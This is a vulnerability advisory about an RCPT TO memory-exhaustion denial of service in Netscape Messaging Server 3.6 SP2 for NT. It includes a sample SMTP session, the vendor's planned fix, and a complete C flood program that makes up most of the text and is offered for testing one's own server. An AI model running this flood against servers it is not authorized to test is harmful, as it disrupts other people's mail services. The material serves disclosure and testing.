COMMAND
RCPT TO:
SYSTEMS AFFECTED
Netscape
PROBLEM
Nobuo Miwa reported the following:
220 victim.workgroup ESMTP server (Netscape Messaging Server -
Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender <rcpt2> Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
...
10,000 times
...
The victim server's allocated memory grew until no memory was left, and it
was never freed afterwards. CPU usage stayed at 100% while the RCPT TO
commands were being received. Nobuo tested this on a machine with 128 MB of
RAM; all physical memory was exhausted after 50 minutes. The test was
performed on Netscape Messaging Server 3.6 SP2 for NT.
Test code (rcpt2.c) for checking YOUR OWN server follows. Note that running it is itself a denial of service against the target: it opens one SMTP session and sends 10,000 oversized RCPT TO commands, so use it only against a server you are authorized to test.
/***************************************************************
You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
to see whether it is vulnerable to an excessive number of RCPT TO commands.
by Nobuo Miwa, LAC Japan 28th Oct. 1999
http://www.lac.co.jp/security/
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
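/*
 * SMTP commands sent before the flood. Lines are terminated with CRLF as
 * RFC 821 requires; the original sent a bare LF, which the tested server
 * tolerated but strict implementations reject.
 */
#define STR_HELO "HELO rcpt2\r\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\r\n"

/*
 * RCPT2_LENGTH: size of the buffer holding one RCPT TO line; the recipient
 *               is padded with 'a' to just under this size.
 * RCPT2_NUMBER: how many RCPT TO commands are sent on the single connection.
 */
enum {
    RCPT2_LENGTH = 8000,
    RCPT2_NUMBER = 10000
};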
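/*
 * Open a TCP connection to port 25 (SMTP) of the given IPv4 address.
 *
 * si          filled in with the peer address (family, port, address)
 * hostIPaddr  IPv4 address in dotted-decimal form. Host names are not
 *             resolved: inet_addr() is used, as in the original.
 *
 * Returns the connected socket descriptor, or -1 if the address is
 * malformed, socket() fails or connect() fails. No descriptor is leaked on
 * any failure path.
 */
int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
    const int port = 25;
    int sd;

    memset(si, 0, sizeof(*si));
    si->sin_addr.s_addr = inet_addr(hostIPaddr);
    /*
     * inet_addr() reports a malformed address as INADDR_NONE. The original
     * did not check this and would have tried to connect to 255.255.255.255
     * (which is therefore also rejected here).
     */
    if (si->sin_addr.s_addr == INADDR_NONE)
        return -1;
    si->sin_family = AF_INET;
    si->sin_port = htons(port);

    sd = socket(si->sin_family, SOCK_STREAM, 0);
    if (sd == -1)
        return -1;

    if (connect(sd, (struct sockaddr *)si, sizeof(struct sockaddr_in)) < 0) {
        close(sd);
        return -1;
    }
    return sd;
}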
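/*
 * Write all of buf to the socket, retrying on short sends.
 * Returns 0 on success, -1 once send() fails (e.g. the peer is gone).
 */
static int sendAll(int sd, const char *buf, size_t len)
{
    int flags = 0;
#ifdef MSG_NOSIGNAL
    /* Get EPIPE instead of a process-killing SIGPIPE when the peer resets. */
    flags = MSG_NOSIGNAL;
#endif
    while (len > 0) {
        ssize_t n = send(sd, buf, len, flags);
        if (n < 0)
            return -1;
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Read one chunk of reply into buf and NUL-terminate it. Like the original,
 * this assumes a single recv() holds the whole reply line.
 * Returns the byte count (> 0), or -1 if the peer closed or an error occurred.
 */
static int recvReply(int sd, char *buf, size_t size)
{
    ssize_t n = recv(sd, buf, size - 1, 0);
    if (n <= 0)
        return -1;
    buf[n] = '\0';
    return (int)n;
}

/*
 * Drive one SMTP session on an already connected socket: read the banner,
 * send HELO and MAIL FROM, then send RCPT2_NUMBER oversized RCPT TO
 * commands, echoing each command and the first 60 bytes of each reply.
 *
 * sd  connected socket from openSocket(); the caller closes it.
 *
 * Fixes over the original: send()/recv() results are checked and the loop
 * stops as soon as the server closes or resets the connection instead of
 * pushing the remaining commands into a dead socket; the reply excerpt was
 * strncpy()'d into an uninitialized 80-byte buffer without a terminator and
 * then printed with %s, which read past the copied bytes.
 */
void sendRCPT2(int sd)
{
    char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH + 80];
    size_t rcptLen;
    int i;

    /* Greeting banner. */
    if (recvReply(sd, tmpStr, sizeof(tmpStr)) < 0) {
        fprintf(stderr, "no SMTP banner received\n");
        return;
    }
    printf("%s", tmpStr);

    printf("%s", STR_HELO);
    if (sendAll(sd, STR_HELO, strlen(STR_HELO)) < 0)
        return;
    if (recvReply(sd, tmpStr, sizeof(tmpStr)) > 0)
        printf("%s", tmpStr);

    printf("%s", STR_MAILFROM);
    if (sendAll(sd, STR_MAILFROM, strlen(STR_MAILFROM)) < 0)
        return;
    if (recvReply(sd, tmpStr, sizeof(tmpStr)) > 0)
        printf("%s", tmpStr);

    /*
     * Build the RCPT TO line once; it is sent unchanged every iteration.
     * The local part is padded with 'a' in 10-byte chunks while more than
     * 12 bytes remain, so at least 3 bytes are always left for CRLF + NUL.
     * (For the default RCPT2_LENGTH this yields the same 7995-byte command
     * the original built with repeated strcat().)
     */
    rcptLen = strlen("RCPT TO: rcpt2@");
    memcpy(rcptStr, "RCPT TO: rcpt2@", rcptLen);
    while (RCPT2_LENGTH - rcptLen > 12) {
        memcpy(rcptStr + rcptLen, "aaaaaaaaaa", 10);
        rcptLen += 10;
    }
    memcpy(rcptStr + rcptLen, "\r\n", 3); /* includes the terminating NUL */
    rcptLen += 2;

    for (i = 0; i < RCPT2_NUMBER; i++) {
        printf("No.%d RCPT TO:rcpt2@aaa.. len %zu\n", i, rcptLen);
        if (sendAll(sd, rcptStr, rcptLen) < 0) {
            fprintf(stderr, "send failed after %d RCPT TO commands\n", i);
            return;
        }
        if (recvReply(sd, tmpStr, sizeof(tmpStr)) < 0) {
            fprintf(stderr, "connection closed after %d RCPT TO commands\n", i);
            return;
        }
        /* Show only the start of the (potentially 8 KB) reply. */
        printf("%.60s \n", tmpStr);
    }
}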
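/*
 * Entry point: connect to the SMTP server at argv[1] and run the RCPT TO
 * flood against it. Exits 1 on bad usage, -1 (255) if the connection fails.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in si;
    int sd;

    printf("You can use ONLY for YOUR Messaging Server 3.6\n");
    if (argc != 2) {
        printf("Usage: %s IPaddress \n", argv[0]);
        exit(1);
    }

    /*
     * The original strcpy()'d argv[1] into an 80-byte stack buffer with no
     * length check (a stack overflow on an over-long argument); the argument
     * is passed straight through instead. openSocket() validates it.
     */
    sd = openSocket(&si, argv[1]);
    /* openSocket() returns -1 on failure; descriptor 0 is a valid socket. */
    if (sd < 0) {
        printf("failed!\n");
        exit(-1);
    }

    sendRCPT2(sd);
    close(sd);
    return 0;
}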
SOLUTION
Netscape said it will release Messaging Server 4.15 for NT in December,
which will fix this problem.